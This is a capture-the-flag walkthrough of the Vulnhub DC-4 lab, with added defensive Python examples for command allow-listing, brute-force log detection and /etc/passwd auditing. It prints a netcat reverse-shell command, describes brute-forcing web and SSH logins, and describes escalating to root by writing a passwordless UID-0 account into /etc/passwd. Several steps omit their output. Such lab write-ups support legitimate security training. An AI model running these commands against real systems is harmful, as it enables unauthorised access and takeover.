We are going to pwn DC-4 by DCAU7 from Vulnhub.
DC-4 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. Unlike the previous DC releases, this one is designed primarily for beginners/intermediates. There is only one flag, but technically, multiple entry points and just like last time, no clues. Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools. For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won’t give you the answer, instead, I’ll give you an idea about how to move forward.
Download Link: https://www.vulnhub.com/entry/dc-4,313/
Let's begin with our initial scan.
Nmap Scan Results
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
Only SSH and HTTP are open, so let's start Gobuster against the web server.
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.0.2.8
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2019/11/26 19:35:19 Starting gobuster
===============================================================
/css (Status: 301)
/images (Status: 301)
/index.php (Status: 200)
===============================================================
2019/11/26 19:35:20 Finished
===============================================================
It looks like a login page. I tried some common SQL injection payloads, but none worked, so let's try brute force. We can use Burp Intruder for that.
Attack type : Cluster Bomb
Now in Payloads, load the wordlist and start the attack!
This one returns a different response length; it might be the password.
And yes, I logged in.
After logging in I got a page, command.php.
It looks like it executes system commands, so I intercepted the request with Burp, swapped in the command below, and got a reverse shell.
nc -e /bin/sh 10.0.2.18 1234
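The command.php page is the classic pattern of handing a request parameter straight to a system call, which is why one request is enough for a shell. As an added defensive illustration, not code from DC-4 or its author, here is how such an endpoint can be written so the client picks only an action name and never supplies a command string; the action names, the paths and the sample inputs are assumptions.

```python
"""Allow-listed command execution: the safe counterpart of a page that runs
whatever command the request carries.  Added example, not DC-4 code; the
action names, the paths and the sample inputs are assumptions."""
import subprocess

# Each permitted action maps to a fixed argv list.  The client supplies only
# the key, so nothing it sends is ever interpreted by a shell.
# The unsafe pattern this replaces is os.system(request["cmd"]) or
# subprocess.run(cmd, shell=True) with cmd taken from the request.
ALLOWED_ACTIONS = {
    "list_files": ["ls", "-l", "/var/www/html"],   # path is an assumption
    "disk_usage": ["df", "-h"],
    "uptime": ["uptime"],
}

SHELL_METACHARACTERS = set(";|&`$<>(){}\n\r")


def resolve_action(user_choice):
    """Return the fixed argv for an allow-listed action, or None."""
    # Exact dictionary lookup: any appended text, however small, makes the
    # string a different key and it is rejected.
    return ALLOWED_ACTIONS.get(user_choice)


def classify_request(user_choice):
    """Label a request for the audit log so injection attempts stand out."""
    if user_choice in ALLOWED_ACTIONS:
        return "allowed"
    if SHELL_METACHARACTERS & set(user_choice):
        return "rejected: shell metacharacters in action"
    return "rejected: unknown action"


def run_action(user_choice, timeout=5):
    """Execute an allow-listed action; return (ok, stdout_or_reason)."""
    argv = resolve_action(user_choice)
    if argv is None:
        return False, classify_request(user_choice)
    # shell=False (the default) with an argv list: no word splitting, no
    # metacharacter handling; the timeout stops a hung process from tying
    # up the worker.
    try:
        proc = subprocess.run(argv, capture_output=True, text=True, timeout=timeout)
    except (OSError, subprocess.TimeoutExpired) as exc:
        return False, f"execution failed: {exc}"
    return proc.returncode == 0, proc.stdout


if __name__ == "__main__":
    for attempt in ("uptime", "uptime; id", "cat /etc/passwd"):
        print(f"{attempt!r}: {classify_request(attempt)}")
```

Logging the classification is as useful as the rejection itself: a stream of "shell metacharacters in action" entries from one client is an early indicator that someone is probing the endpoint.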
We got a Shell!!
While searching for anything useful, I found
Since I found it in jim's directory, let's brute-force with
Getting User Jim
Let's start brute-forcing the SSH port using hydra.
hydra - a very fast network logon cracker which supports many different services
We found the password is
Found some users too
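Both guessing attacks in this write-up, the Burp Intruder run against the web login and the hydra run against SSH, leave the same trace on the target: a burst of failures from one source in a short time, which is exactly what a defender alerts on. The script below is an added detection example, not part of the original post. It parses constructed auth.log and Apache access-log lines (the timestamps, PIDs, the login path /index.php and the 10.0.2.18 source are sample values), flags sources exceeding a failure threshold inside a sliding window, and also reports the more telling event of a successful SSH login from a source that had just been flagged.

```python
"""Brute-force detection over constructed sshd and Apache log lines.
Added example, not part of the DC-4 write-up; timestamps, PIDs, the login
path and the 10.0.2.18 source are sample values."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of /var/log/auth.log during a password-guessing run against jim.
AUTH_LOG = """\
Nov 26 19:50:01 dc-4 sshd[1201]: Failed password for jim from 10.0.2.18 port 40001 ssh2
Nov 26 19:50:01 dc-4 sshd[1203]: Failed password for jim from 10.0.2.18 port 40002 ssh2
Nov 26 19:50:02 dc-4 sshd[1205]: Failed password for jim from 10.0.2.18 port 40003 ssh2
Nov 26 19:50:02 dc-4 sshd[1207]: Failed password for jim from 10.0.2.18 port 40004 ssh2
Nov 26 19:50:03 dc-4 sshd[1209]: Failed password for jim from 10.0.2.18 port 40005 ssh2
Nov 26 19:50:03 dc-4 sshd[1211]: Accepted password for jim from 10.0.2.18 port 40006 ssh2
Nov 26 19:55:00 dc-4 sshd[1300]: Failed password for charles from 10.0.2.30 port 41000 ssh2
"""

# Constructed sample of the Apache access log during a run against the login
# form; the final 302 is the one attempt that got in.
ACCESS_LOG = """\
10.0.2.18 - - [26/Nov/2019:19:40:00 +0000] "POST /index.php HTTP/1.1" 200 1187
10.0.2.18 - - [26/Nov/2019:19:40:00 +0000] "POST /index.php HTTP/1.1" 200 1187
10.0.2.18 - - [26/Nov/2019:19:40:01 +0000] "POST /index.php HTTP/1.1" 200 1187
10.0.2.18 - - [26/Nov/2019:19:40:01 +0000] "POST /index.php HTTP/1.1" 200 1187
10.0.2.18 - - [26/Nov/2019:19:40:02 +0000] "POST /index.php HTTP/1.1" 302 0
10.0.2.30 - - [26/Nov/2019:19:41:00 +0000] "GET /index.php HTTP/1.1" 200 1432
"""

SSH_LINE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)"
)
HTTP_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_ssh(text):
    """Yield (timestamp, ip, user, result) for sshd password-auth lines."""
    for line in text.splitlines():
        m = SSH_LINE.match(line)
        if m:
            # auth.log carries no year; strptime fills in 1900, which still
            # orders events correctly within one file.
            ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
            yield ts, m["ip"], m["user"], m["result"]


def parse_login_posts(text, login_path):
    """Yield (timestamp, ip) for every POST to the login form."""
    for line in text.splitlines():
        m = HTTP_LINE.match(line)
        if m and m["method"] == "POST" and m["path"] == login_path:
            yield datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"), m["ip"]


def find_bursts(events, threshold, window):
    """Return {ip: peak count} for sources with >= threshold events inside
    any sliding window; `events` yields (timestamp, ip) pairs."""
    by_ip = defaultdict(list)
    for ts, ip in events:
        by_ip[ip].append(ts)
    flagged = {}
    for ip, times in by_ip.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                flagged[ip] = max(flagged.get(ip, 0), count)
    return flagged


def ssh_bursts(text, threshold=5, window=timedelta(seconds=60)):
    """Sources with a burst of failed SSH password attempts."""
    fails = ((ts, ip) for ts, ip, _, result in parse_ssh(text) if result == "Failed")
    return find_bursts(fails, threshold, window)


def ssh_logins_after_burst(text, threshold=5, window=timedelta(seconds=60)):
    """Accepted logins from a source already flagged for a failure burst:
    the signature of a guessed password, not a mistyped one."""
    flagged = ssh_bursts(text, threshold, window)
    return [(user, ip) for _, ip, user, result in parse_ssh(text)
            if result == "Accepted" and ip in flagged]


def web_bursts(text, login_path="/index.php", threshold=5, window=timedelta(seconds=60)):
    """Sources hammering the login form with POSTs."""
    return find_bursts(parse_login_posts(text, login_path), threshold, window)


if __name__ == "__main__":
    print("ssh bursts:", ssh_bursts(AUTH_LOG))
    print("logins after burst:", ssh_logins_after_burst(AUTH_LOG))
    print("web bursts:", web_bursts(ACCESS_LOG))
```

The same sliding-window routine serves both logs; only the parser differs. The threshold and window are tuning knobs: five failures in a minute catches a wordlist run while leaving a user who fumbles a password twice alone, and the "accepted after burst" list is the one that should page someone.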
Getting User Charles
While checking jim's directory, there is
Since it looks like mail, we check
It gives the password for charles, so I su to charles.
sudo -l shows we can run teehee with root permissions.
It looks like we can overwrite any file, so I created a new user with root permissions and no password!
Got ROOT !!
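The final step works by writing, as root, to a file that only root should control, and it leaves very specific artefacts in /etc/passwd. The script below is an added example, not from the write-up: it audits a constructed passwd sample (the "rogue" account and the other entries are invented) for a second UID-0 account, an empty password field, a hash stored in passwd instead of shadow, duplicate names and malformed lines, which is the check a defender would run after any sudo rule that allows arbitrary file writes.

```python
"""Audit an /etc/passwd file for the traces a privileged arbitrary-file write
leaves behind.  Added example with a constructed sample; the entries,
including the "rogue" account, are invented."""

# Constructed sample of /etc/passwd after an extra entry was written to it.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
jim:x:1001:1001:Jim,,,:/home/jim:/bin/bash
charles:x:1002:1002:Charles,,,:/home/charles:/bin/bash
rogue::0:0::/root:/bin/bash
"""


def parse_passwd(text):
    """Split passwd text into parsed entries and lines that do not fit the
    seven-field format (which is itself a finding)."""
    entries, malformed = [], []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit() or not fields[3].isdigit():
            malformed.append((lineno, line))
            continue
        name, pw, uid, gid, _gecos, home, shell = fields
        entries.append({"line": lineno, "name": name, "pw": pw, "uid": int(uid),
                        "gid": int(gid), "home": home, "shell": shell})
    return entries, malformed


def audit_passwd(text, expected_root="root"):
    """Return a list of (finding, account_or_line, line_number) tuples."""
    entries, malformed = parse_passwd(text)
    findings = []
    seen = set()
    for e in entries:
        if e["uid"] == 0 and e["name"] != expected_root:
            findings.append(("extra-uid0", e["name"], e["line"]))
        if e["pw"] == "":
            # Empty second field: login with no password at all.
            findings.append(("empty-password", e["name"], e["line"]))
        elif e["pw"] not in ("x", "*") and not e["pw"].startswith("!"):
            # Anything else is a hash kept in the world-readable passwd file
            # instead of /etc/shadow.
            findings.append(("hash-in-passwd", e["name"], e["line"]))
        if e["name"] in seen:
            findings.append(("duplicate-name", e["name"], e["line"]))
        seen.add(e["name"])
    for lineno, line in malformed:
        findings.append(("malformed", line, lineno))
    return findings


if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD):
        print(*finding)
```

Run against the real file this is a cheap periodic check; paired with a file-integrity monitor on /etc/passwd and /etc/shadow, and a review of sudo rules that hand out file-writing binaries as root, it closes the gap this box leaves open.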